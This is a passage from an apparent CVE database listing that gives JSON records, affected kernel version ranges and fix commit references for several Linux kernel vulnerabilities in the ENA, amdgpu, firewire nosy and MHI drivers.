"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b26aa765f7437e1bbe8db4c1641b12bd5dd378f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fdfbf54d128ab6ab255db138488f9650485795a2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/19ff8fed3338898b70b2aad831386c78564912e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5c7f2240d9835a7823d87f7460d8eae9f4e504c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c31baa07f01307b7ae05f3ce32b89d8e2ba0cc1d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bf02d9fe00632d22fa91d34749c7aacf397b6cde"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/amazon/ena/ena_netdev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b26aa765f7437e1bbe8db4c1641b12bd5dd378f0",
"status": "affected",
"version": "548c4940b9f1f527f81509468dd60b61418880b6",
"versionType": "git"
},
{
"lessThan": "fdfbf54d128ab6ab255db138488f9650485795a2",
"status": "affected",
"version": "548c4940b9f1f527f81509468dd60b61418880b6",
"versionType": "git"
},
{
"lessThan": "19ff8fed3338898b70b2aad831386c78564912e1",
"status": "affected",
"version": "548c4940b9f1f527f81509468dd60b61418880b6",
"versionType": "git"
},
{
"lessThan": "5c7f2240d9835a7823d87f7460d8eae9f4e504c7",
"status": "affected",
"version": "548c4940b9f1f527f81509468dd60b61418880b6",
"versionType": "git"
},
{
"lessThan": "c31baa07f01307b7ae05f3ce32b89d8e2ba0cc1d",
"status": "affected",
"version": "548c4940b9f1f527f81509468dd60b61418880b6",
"versionType": "git"
},
{
"lessThan": "bf02d9fe00632d22fa91d34749c7aacf397b6cde",
"status": "affected",
"version": "548c4940b9f1f527f81509468dd60b61418880b6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/amazon/ena/ena_netdev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.156",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.156",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ena: Fix incorrect descriptor free behavior\n\nENA has two types of TX queues:\n- queues which only process TX packets arriving from the network stack\n- queues which only process TX packets forwarded to it by XDP_REDIRECT\n or XDP_TX instructions\n\nThe ena_free_tx_bufs() cycles through all descriptors in a TX queue\nand unmaps + frees every descriptor that hasn\u0027t been acknowledged yet\nby the device (uncompleted TX transactions).\nThe function assumes that the processed TX queue is necessarily from\nthe first category listed above and ends up using napi_consume_skb()\nfor descriptors belonging to an XDP specific queue.\n\nThis patch solves a bug in which, in case of a VF reset, the\ndescriptors aren\u0027t freed correctly, leading to crashes."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:13.745Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b26aa765f7437e1bbe8db4c1641b12bd5dd378f0"
},
{
"url": "https://git.kernel.org/stable/c/fdfbf54d128ab6ab255db138488f9650485795a2"
},
{
"url": "https://git.kernel.org/stable/c/19ff8fed3338898b70b2aad831386c78564912e1"
},
{
"url": "https://git.kernel.org/stable/c/5c7f2240d9835a7823d87f7460d8eae9f4e504c7"
},
{
"url": "https://git.kernel.org/stable/c/c31baa07f01307b7ae05f3ce32b89d8e2ba0cc1d"
},
{
"url": "https://git.kernel.org/stable/c/bf02d9fe00632d22fa91d34749c7aacf397b6cde"
}
],
"title": "net: ena: Fix incorrect descriptor free behavior",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35958",
"datePublished": "2024-05-20T09:41:50.585Z",
"dateReserved": "2024-05-17T13:50:33.136Z",
"dateUpdated": "2025-05-04T09:09:13.745Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26922 (GCVE-0-2024-26922)
Vulnerability from cvelistv5
Published
2024-04-23 13:05
Modified
2025-11-04 17:14
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: validate the parameters of bo mapping operations more clearly
Verify the parameters of
amdgpu_vm_bo_(map/replace_map/clearing_mappings) in one common place.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 Version: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 Version: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 Version: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 Version: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 Version: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 Version: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 Version: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:14:43.597Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d4da6b084f1c5625937d49bb6722c5b4aef11b8d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f68039375d4d6d67303674c0ab2d06b7295c0ec9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1fd7db5c16028dc07b2ceec190f2e895dddb532d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8b12fc7b032633539acdf7864888b0ebd49e90f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/212e3baccdb1939606420d88f7f52d346b49a284"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef13eeca7c79136bc38e21eb67322c1cbd5c40ee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b1f04b9b1c5317f562a455384c5f7473e46bdbaa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6fef2d4c00b5b8561ad68dd2b68173f5c6af1e75"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26922",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:46:55.644106Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:15.988Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d4da6b084f1c5625937d49bb6722c5b4aef11b8d",
"status": "affected",
"version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
"versionType": "git"
},
{
"lessThan": "f68039375d4d6d67303674c0ab2d06b7295c0ec9",
"status": "affected",
"version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
"versionType": "git"
},
{
"lessThan": "1fd7db5c16028dc07b2ceec190f2e895dddb532d",
"status": "affected",
"version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
"versionType": "git"
},
{
"lessThan": "8b12fc7b032633539acdf7864888b0ebd49e90f2",
"status": "affected",
"version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
"versionType": "git"
},
{
"lessThan": "212e3baccdb1939606420d88f7f52d346b49a284",
"status": "affected",
"version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
"versionType": "git"
},
{
"lessThan": "ef13eeca7c79136bc38e21eb67322c1cbd5c40ee",
"status": "affected",
"version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
"versionType": "git"
},
{
"lessThan": "b1f04b9b1c5317f562a455384c5f7473e46bdbaa",
"status": "affected",
"version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
"versionType": "git"
},
{
"lessThan": "6fef2d4c00b5b8561ad68dd2b68173f5c6af1e75",
"status": "affected",
"version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.12"
},
{
"lessThan": "4.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: validate the parameters of bo mapping operations more clearly\n\nVerify the parameters of\namdgpu_vm_bo_(map/replace_map/clearing_mappings) in one common place."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:46.556Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d4da6b084f1c5625937d49bb6722c5b4aef11b8d"
},
{
"url": "https://git.kernel.org/stable/c/f68039375d4d6d67303674c0ab2d06b7295c0ec9"
},
{
"url": "https://git.kernel.org/stable/c/1fd7db5c16028dc07b2ceec190f2e895dddb532d"
},
{
"url": "https://git.kernel.org/stable/c/8b12fc7b032633539acdf7864888b0ebd49e90f2"
},
{
"url": "https://git.kernel.org/stable/c/212e3baccdb1939606420d88f7f52d346b49a284"
},
{
"url": "https://git.kernel.org/stable/c/ef13eeca7c79136bc38e21eb67322c1cbd5c40ee"
},
{
"url": "https://git.kernel.org/stable/c/b1f04b9b1c5317f562a455384c5f7473e46bdbaa"
},
{
"url": "https://git.kernel.org/stable/c/6fef2d4c00b5b8561ad68dd2b68173f5c6af1e75"
}
],
"title": "drm/amdgpu: validate the parameters of bo mapping operations more clearly",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26922",
"datePublished": "2024-04-23T13:05:04.243Z",
"dateReserved": "2024-02-19T14:20:24.194Z",
"dateUpdated": "2025-11-04T17:14:43.597Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-27401 (GCVE-0-2024-27401)
Vulnerability from cvelistv5
Published
2024-05-13 10:29
Modified
2025-05-04 09:04
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
firewire: nosy: ensure user_length is taken into account when fetching packet contents
Ensure that packet_buffer_get respects the user_length provided. If
the length of the head packet exceeds the user_length, packet_buffer_get
will now return 0 to signify to the user that no data were read
and a larger buffer size is required. Helps prevent user space overflows.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27401",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-13T17:55:43.034157Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:00.939Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.126Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/67f34f093c0f7bf33f5b4ae64d3d695a3b978285"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7b8c7bd2296e95b38a6ff346242356a2e7190239"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cca330c59c54207567a648357835f59df9a286bb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/79f988d3ffc1aa778fc5181bdfab312e57956c6b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4ee0941da10e8fdcdb34756b877efd3282594c1f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1fe60ee709436550f8cfbab01295936b868d5baa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/539d51ac48bcfcfa1b3d4a85f8df92fa22c1d41c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/38762a0763c10c24a4915feee722d7aa6e73eb98"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OTB4HWU2PTVW5NEYHHLOCXDKG3PYA534/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DW2MIOIMOFUSNLHLRYX23AFR36BMKD65/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firewire/nosy.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "67f34f093c0f7bf33f5b4ae64d3d695a3b978285",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7b8c7bd2296e95b38a6ff346242356a2e7190239",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cca330c59c54207567a648357835f59df9a286bb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "79f988d3ffc1aa778fc5181bdfab312e57956c6b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4ee0941da10e8fdcdb34756b877efd3282594c1f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1fe60ee709436550f8cfbab01295936b868d5baa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "539d51ac48bcfcfa1b3d4a85f8df92fa22c1d41c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "38762a0763c10c24a4915feee722d7aa6e73eb98",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firewire/nosy.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirewire: nosy: ensure user_length is taken into account when fetching packet contents\n\nEnsure that packet_buffer_get respects the user_length provided. If\nthe length of the head packet exceeds the user_length, packet_buffer_get\nwill now return 0 to signify to the user that no data were read\nand a larger buffer size is required. Helps prevent user space overflows."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:04:18.940Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/67f34f093c0f7bf33f5b4ae64d3d695a3b978285"
},
{
"url": "https://git.kernel.org/stable/c/7b8c7bd2296e95b38a6ff346242356a2e7190239"
},
{
"url": "https://git.kernel.org/stable/c/cca330c59c54207567a648357835f59df9a286bb"
},
{
"url": "https://git.kernel.org/stable/c/79f988d3ffc1aa778fc5181bdfab312e57956c6b"
},
{
"url": "https://git.kernel.org/stable/c/4ee0941da10e8fdcdb34756b877efd3282594c1f"
},
{
"url": "https://git.kernel.org/stable/c/1fe60ee709436550f8cfbab01295936b868d5baa"
},
{
"url": "https://git.kernel.org/stable/c/539d51ac48bcfcfa1b3d4a85f8df92fa22c1d41c"
},
{
"url": "https://git.kernel.org/stable/c/38762a0763c10c24a4915feee722d7aa6e73eb98"
}
],
"title": "firewire: nosy: ensure user_length is taken into account when fetching packet contents",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27401",
"datePublished": "2024-05-13T10:29:53.862Z",
"dateReserved": "2024-02-25T13:47:42.681Z",
"dateUpdated": "2025-05-04T09:04:18.940Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52493 (GCVE-0-2023-52493)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bus: mhi: host: Drop chan lock before queuing buffers
Ensure read and write locks for the channel are not taken in succession by
dropping the read lock from parse_xfer_event() such that a callback given
to client can potentially queue buffers and acquire the write lock in that
process. Any queueing of buffers should be done without channel read lock
acquired as it can result in multiple locks and a soft lockup.
[mani: added fixes tag and cc'ed stable]
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1d3173a3bae7039b765a0956e3e4bf846dbaacb8 Version: 1d3173a3bae7039b765a0956e3e4bf846dbaacb8 Version: 1d3173a3bae7039b765a0956e3e4bf846dbaacb8 Version: 1d3173a3bae7039b765a0956e3e4bf846dbaacb8 Version: 1d3173a3bae7039b765a0956e3e4bf846dbaacb8 Version: 1d3173a3bae7039b765a0956e3e4bf846dbaacb8 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52493",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-11T19:11:31.515959Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:07.781Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:20.707Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/20a6dea2d1c68d4e03c6bb50bc12e72e226b5c0e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e4c84316e2b70709f0d00c33ba3358d9fc8eece"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3c5ec66b4b3f6816f3a6161538672e389e537690"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eaefb9464031215d63c0a8a7e2bfaa00736aa17e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b8eff20d87092e14cac976d057cb0aea2f1d0830"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/01bd694ac2f682fb8017e16148b928482bc8fa4b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/bus/mhi/host/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "20a6dea2d1c68d4e03c6bb50bc12e72e226b5c0e",
"status": "affected",
"version": "1d3173a3bae7039b765a0956e3e4bf846dbaacb8",
"versionType": "git"
},
{
"lessThan": "6e4c84316e2b70709f0d00c33ba3358d9fc8eece",
"status": "affected",
"version": "1d3173a3bae7039b765a0956e3e4bf846dbaacb8",
"versionType": "git"
},
{
"lessThan": "3c5ec66b4b3f6816f3a6161538672e389e537690",
"status": "affected",
